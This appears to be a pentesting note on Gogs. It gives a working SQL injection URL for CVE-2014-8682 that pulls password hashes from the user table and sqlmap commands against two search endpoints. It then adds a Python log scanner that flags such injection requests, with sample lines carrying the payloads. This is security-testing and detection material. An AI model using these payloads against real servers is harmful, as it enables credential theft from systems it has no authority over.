Gogs Pentesting
Last modified: 2023-03-18
Gogs (Go Git Service) is a painless self-hosted Git Service.
SQL injection (CVE-2014-8682)
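The q parameter of the search API is injectable. Example request against the user search endpoint, reading the passwd column of the user table:
http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--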
Automation
sqlmap -u "https://example.com/api/v1/repos/search?q=test"
sqlmap -u "https://example.com/api/v1/users/search?q=test"
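Detection side of the requests above, as an added example that is not part of the original page or of Gogs: a Python scan of access log lines that flags requests to the two search endpoints whose URL-decoded q value shows several injection indicators at once. The combined log format, the indicator names, the threshold and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Search endpoints named on this page; both take the `q` parameter.
SEARCH_PATHS = {"/api/v1/users/search", "/api/v1/repos/search"}

# Request target inside a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A gap between SQL keywords: whitespace or an inline /**/ comment.
GAP = r"(?:\s|/\*.*?\*/)+"
# Indicators evaluated against the URL-decoded `q` value (names are this example's own).
INDICATORS = {
    "quote_breakout": re.compile(r"['\"]\s*\)"),
    "inline_comment": re.compile(r"/\*.*?\*/"),
    "union_select": re.compile(rf"union{GAP}(?:all{GAP})?select", re.I),
    "trailing_comment": re.compile(r"(?:--|#)\s*$"),
}

def score_request(target):
    """Return sorted indicator names matching `q` on a Gogs search endpoint."""
    parts = urlsplit(target)
    if parts.path.rstrip("/") not in SEARCH_PATHS:
        return []
    hits = set()
    for value in parse_qs(parts.query, keep_blank_values=True).get("q", []):
        hits.update(n for n, rx in INDICATORS.items() if rx.search(value))
    return sorted(hits)

def scan(lines, threshold=2):
    """Return (line_number, indicators) for lines with >= threshold indicators."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        hits = score_request(match.group(1)) if match else []
        if len(hits) >= threshold:
            findings.append((number, hits))
    return findings

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Mar/2023:10:00:01 +0000] "GET /api/v1/users/search?q=alice HTTP/1.1" 200 512',
    '203.0.113.7 - - [18/Mar/2023:10:00:02 +0000] "GET /api/v1/repos/search?q=c-- HTTP/1.1" 200 340',
    '198.51.100.9 - - [18/Mar/2023:10:00:05 +0000] "GET /api/v1/users/search?q=%27%29/**/union/**/all/**/select/**/1,1,1-- HTTP/1.1" 500 0',
    '198.51.100.9 - - [18/Mar/2023:10:00:06 +0000] "GET /api/v1/repos/search?q=%27)%2F**%2FUNION+SELECT+1%23 HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

The threshold of two indicators keeps an ordinary search such as c-- from being flagged on a single match.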